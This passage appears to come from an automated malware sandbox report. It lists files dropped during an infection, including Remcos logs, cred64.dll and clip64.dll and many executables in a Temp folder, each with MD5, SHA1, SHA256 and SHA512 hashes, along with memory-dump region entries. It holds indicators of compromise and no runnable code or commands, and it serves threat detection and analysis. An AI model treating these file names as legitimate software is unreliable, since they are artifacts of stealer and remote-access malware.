| SHA512 | b186331b49e7821466fd003980f9ca57f5bcf41574c1d1893b8949d8a944ffe67f06d8a67d4bfdf4599fcd4f3282c36bed1fc8585e1f8dd541e8fdf121f48eeb |
C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll
| MD5 | c6aabb27450f1a9939a417e86bf53217 |
| SHA1 | b8ef3bb7575139fd6997379415d7119e452b5fc4 |
| SHA256 | b91a3743c7399aee454491862e015ef6fc668a25d1aa2816e065a86a03f6be35 |
| SHA512 | e5fe205cb0f419e0a320488d6fa4a70e5ed58f25b570b41412ebd4f32bbe504ff75acb20bfea22513102630cf653a41e5090051f20af2ed3aadb53ce16a05944 |
C:\ProgramData\registro\registros.dat
| MD5 | 1831fe6ae821f78f2cd3d5ddbf6d7ca5 |
| SHA1 | 95513d770d4bfe3f8cea7126fce93156b83123fb |
| SHA256 | 6480c38109d04ca460dcdbc9e59756f89de279252293f9b7fb67fa57169806fc |
| SHA512 | 701b034eb4f7efd6340321436f1d944f4758bdee8c91230b3291b1b7f457be12b116ee1b759a826e2711f2ff8b0fe71ae8053a16469be312f12d87f0ff081d11 |
memory/2360-3483-0x000000001D590000-0x000000001DEE3000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8P9TO0C6\ssg[1].exe
| MD5 | 7b6730ca4da283a35c41b831b9567f15 |
| SHA1 | 92ef2fd33f713d72207209ec65f0de6eef395af5 |
| SHA256 | 94d7d12ae53ce97f38d8890383c2317ce03d45bd6ecaf0e0b9165c7066cd300c |
| SHA512 | ae2d10f9895e5f2af10b4fa87cdb7c930a531e910b55cd752b15dac77a432cc28eca6e5b32b95eeb21e238aaf2eb57e29474660cae93e734d0b6543c1d462ace |
memory/7024-3495-0x0000000000370000-0x00000000003C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\connect.exe
| MD5 | 1a36cf24b944aaa197043b753b0a6489 |
| SHA1 | ecd13b536536fae303df439e8b6c8967b16d38b5 |
| SHA256 | b04789056a7934edce4956963a37abed9558febe44cc83ada5e3a5708caa11cc |
| SHA512 | ef2c20de078b3ce2e34cb57f6789f60c4e801d3ca76b6a86247d985bc8e6a0ec723f4cd157625094c5345f4209eeef6ecec949586cbb53fe24e7c34d7778e368 |
C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe
| MD5 | 4afb95fbf1d102bb7b01e7ea40efc57c |
| SHA1 | 7753e2e22808ac25bc9e9b6b5c93e28154457433 |
| SHA256 | 12a1ee910e42c3b85491cd8006e96062e14c87d64996e5223f3713cbb4077caa |
| SHA512 | d97607e607b81432cf9ea1b71277bf632cbdd25a10fb9b3e019c314bbbba4b715959c4f6e4b406ad8accbe2f7407491f18c7d61f05776778e78a579214e934eb |
memory/7112-3525-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe
| MD5 | aed024049f525c8ae6671ebdd7001c30 |
| SHA1 | fadd86e0ce140dc18f33193564d0355b02ee9b05 |
| SHA256 | 9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494 |
| SHA512 | ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2 |
memory/7112-3534-0x0000000002500000-0x0000000002508000-memory.dmp
memory/7112-3536-0x0000000002520000-0x000000000252E000-memory.dmp
memory/7112-3537-0x000000001B620000-0x000000001B666000-memory.dmp
memory/7112-3546-0x0000000002550000-0x000000000255A000-memory.dmp
memory/4068-3552-0x000000013F290000-0x000000013F2A8000-memory.dmp
memory/7112-3553-0x00000000026A0000-0x00000000026A8000-memory.dmp
memory/5772-3558-0x0000000005560000-0x00000000056C2000-memory.dmp
memory/3740-3559-0x000000001BA70000-0x000000001BABE000-memory.dmp
memory/5772-3560-0x0000000000470000-0x0000000000492000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll
| MD5 | c2f3fbbbe6d5f48a71b6b168b1485866 |
| SHA1 | 1cd56cfc2dc07880b65bd8a1f5b7147633f5d553 |
| SHA256 | c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839 |
| SHA512 | e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a |
memory/5792-3623-0x0000000000100000-0x000000000021A000-memory.dmp
memory/5792-3624-0x00000000021B0000-0x00000000022CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 3626532127e3066df98e34c3d56a1869 |
| SHA1 | 5fa7102f02615afde4efd4ed091744e842c63f78 |
| SHA256 | 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca |
| SHA512 | dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd |
memory/5792-4813-0x0000000004D20000-0x0000000004DAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
| MD5 | f8d528a37993ed91d2496bab9fc734d3 |
| SHA1 | 4b66b225298f776e21f566b758f3897d20b23cad |
| SHA256 | bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02 |
| SHA512 | 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
memory/5648-4826-0x0000000000350000-0x0000000000ACB000-memory.dmp
memory/2360-4844-0x000000001D590000-0x000000001DD0B000-memory.dmp
memory/2360-4846-0x000000001D590000-0x000000001DD0B000-memory.dmp
C:\ProgramData\fdgfghgfhg\logs.dat
| MD5 | a6ace362d6e27142628b85801de459f0 |
| SHA1 | ef698767c08f74215e8f2fae1063722029301ba1 |
| SHA256 | 1aea15b1d733b137b2769be099bb97109979c19a2352f7b3a2bbccf61bcd272c |
| SHA512 | 90defb5f9fb81c3b7c2fcb9b8dbbd25c20a54d26210ba402faddba17e70be6d20bc6e6a6e95c5e678cb96f68772783efae95c0d774e051b008dc6c32b683e3b9 |
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
| MD5 | 3297554944a2e2892096a8fb14c86164 |
| SHA1 | 4b700666815448a1e0f4f389135fddb3612893ec |
| SHA256 | e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495 |
| SHA512 | 499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25 |
memory/5388-4894-0x0000000000E30000-0x000000000180C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
| MD5 | 3567cb15156760b2f111512ffdbc1451 |
| SHA1 | 2fdb1f235fc5a9a32477dab4220ece5fda1539d4 |
| SHA256 | 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630 |
| SHA512 | e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba |
memory/5276-4927-0x000000013FE50000-0x00000001402E0000-memory.dmp
memory/548-4926-0x000000013FE50000-0x00000001402E0000-memory.dmp
memory/5276-4916-0x000000013FE50000-0x00000001402E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
| MD5 | 87d7fffd5ec9e7bc817d31ce77dee415 |
| SHA1 | 6cc44ccc0438c65cdef248cc6d76fc0d05e79222 |
| SHA256 | 47ae8e5d41bbd1eb506a303584b124c3c8a1caeac4564252fa78856190f0f628 |
| SHA512 | 1d2c6ec8676cb1cfbe37f808440287ea6a658d3f21829b5001c3c08a663722eb0537cc681a6faa7d39dc16a101fa2bbf55989a64a7c16143f11aa96033b886a5 |
memory/5388-4935-0x0000000000E30000-0x000000000180C000-memory.dmp
memory/5388-4936-0x0000000000E30000-0x000000000180C000-memory.dmp
memory/2360-4959-0x000000001D590000-0x000000001DD0B000-memory.dmp
memory/2360-4958-0x000000001D590000-0x000000001DD0B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
| MD5 | 9821fa45714f3b4538cc017320f6f7e5 |
| SHA1 | 5bf0752889cefd64dab0317067d5e593ba32e507 |
| SHA256 | fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72 |
| SHA512 | 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898 |
memory/1528-4967-0x0000000001080000-0x0000000001510000-memory.dmp
memory/1864-5002-0x000000001B330000-0x000000001B612000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
| MD5 | 4c64aec6c5d6a5c50d80decb119b3c78 |
| SHA1 | bc97a13e661537be68863667480829e12187a1d7 |
| SHA256 | 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253 |
| SHA512 | 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76 |
memory/1864-5010-0x00000000024B0000-0x00000000024B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YUQ360O1RNBHRKOHEET9.temp
| MD5 | 38ded03e8d8af146989c18a81567dc71 |
| SHA1 | 2e2dfa4859894c489d3c95aadddeacd0a0859ce6 |
| SHA256 | 75de4ef6c4575802ffd5b48d818ffce7a0b9611cc0bbeb21c38f114314990c60 |
| SHA512 | c112b008c88ccff868e3a78181559b7086e101df69efae51b4c3d4c5ec825ebb828bdbfac64e15404113e2a36639767fad4bfa1d663a58c94326c6a488e0dfc3 |
C:\Users\Admin\AppData\Local\Temp\a\888.exe
| MD5 | b6e5859c20c608bf7e23a9b4f8b3b699 |
| SHA1 | 302a43d218e5fd4e766d8ac439d04c5662956cc3 |
| SHA256 | bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075 |
| SHA512 | 60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c |
C:\Users\Admin\AppData\Local\Temp\Tmp1B7D.tmp
| MD5 | 7931cef0d26fb7464ba0034630cdb00a |
| SHA1 | f52d6ebd9941ce1f3092ea3ed14d89538381c99a |
| SHA256 | 0ee466217697b054b14dabb0906dde249c5067ae017ae7127df8bfa9d9c9fdb3 |
| SHA512 | 59ea76d1c9dd93080d8e9c0a4751a187812ce4cdbf1cd7ca587a7f4cfd96fdada57e25778df55904b096b919baad6b8aad1cb6d5251c68a2bc9dd2f10b176111 |
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A7B0B1ACBBA6DD2EBA938E1856F22B3D9D50F942
| MD5 | 66b1e81d56c3c7dba111453b70227a23 |
| SHA1 | c677140aa4f6e39f68c46ef2d0e10589587ecaae |
| SHA256 | b3c56af2e8b25502438cb4b498d81cec59dcd15636b6050c48576490092f57c0 |
| SHA512 | af9d650a104510351c9d68fcbb91c61b1620e1bf82bd571c965db5a9ce69455a197b19a6aa035a0283c5f828829ae5a6cdfa056eca518c3dd9131a3671cc97d9 |
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
| MD5 | 53e54ac43786c11e0dde9db8f4eb27ab |
| SHA1 | 9c5768d5ee037e90da77f174ef9401970060520e |
| SHA256 | 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8 |
| SHA512 | cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950 |
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
| MD5 | f89267b24ecf471c16add613cec34473 |
| SHA1 | c3aad9d69a3848cedb8912e237b06d21e1e9974f |
| SHA256 | 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92 |
| SHA512 | c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d |
C:\ProgramData\Remcos\logs.dat
| MD5 | 890b89b3de019b7dccc025ee23e4ed1c |
| SHA1 | b195f7182895941a7baebe767ff2b38307ef30ed |
| SHA256 | 92da77ef983f41d3d0049c0804d8b517ce003dc79b84bbc7b0675df4bc56a159 |
| SHA512 | c1340ad2556b526f39aa4aa7ffdc3523d89d14c7d16712846a01c6b04cf70aeba551712a845721c746118890867b581a000a7cb47db27118c15c3e4c0149e18c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\76561199804377619[1].htm
| MD5 | 2b22c2a830b5dbb96a9d1e4087692397 |
| SHA1 | b30efcab743aa996b88c9e99684148881bf8d88e |
| SHA256 | 714d771c4a6d1d3c0763b9630a128123d5fc4e2cc353326d6e0166fb91210f09 |
| SHA512 | 1400413c940b591d12fce2f7cda4c0cb80a4853423f34c8c42560c8575ea7b7b9b5d9835e9c43ff15eadd77f8d0ce635d61fa60d75060155c07de3385382d66e |
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWAConfig.bin
| MD5 | ff451a7e9dd2f93b291b184896d51c9d |
| SHA1 | 1a78cdea7e21efdb5f4f1f6ff72e0330821aac54 |
| SHA256 | aa8361791d72cbac6f55596ebd1bcb6d975ac31fe5db5318772a88065778d5bd |
| SHA512 | 916cc56eff712ecac817f1d4d565c747493fdcafed917376cce1f8e9b45f7586780c228ac8941c2a33362c3724eb5adfef714f8ddc4b5c395633fe32989b7a1c |